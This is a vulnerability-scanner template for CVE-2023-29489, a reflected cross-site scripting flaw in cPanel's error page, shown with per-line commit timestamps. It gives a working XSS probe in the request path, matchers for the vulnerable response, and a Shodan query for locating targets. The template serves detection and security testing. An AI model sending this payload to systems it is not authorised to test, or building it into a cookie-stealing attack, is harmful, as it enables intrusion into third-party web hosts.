2023-04-27 01:00:20 +00:00
|
|
|
id: CVE-2023-29489
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: cPanel - Cross-Site Scripting
|
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: medium
|
2023-05-30 09:57:27 +00:00
|
|
|
description: |
|
|
|
|
An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
|
|
|
|
reference:
|
|
|
|
- https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-29489
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/
|
2023-05-30 09:14:58 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2023-29489
|
|
|
|
cwe-id: CWE-79
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00276
|
2023-05-30 09:14:58 +00:00
|
|
|
cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-percentile: 0.64121
|
2023-04-27 01:00:20 +00:00
|
|
|
metadata:
|
2023-06-03 18:56:35 +00:00
|
|
|
max-request: 1
|
2023-04-27 01:00:20 +00:00
|
|
|
shodan-query: title:"cPanel"
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: cpanel
|
|
|
|
product: cpanel
|
2023-04-27 03:30:46 +00:00
|
|
|
tags: cve,cve2023,cpanel,xss
|
2023-04-27 01:00:20 +00:00
|
|
|
|
2023-04-27 12:24:02 +00:00
|
|
|
http:
|
2023-04-27 01:00:20 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
|
|
|
|
- 'Invalid webcall ID:'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 400
|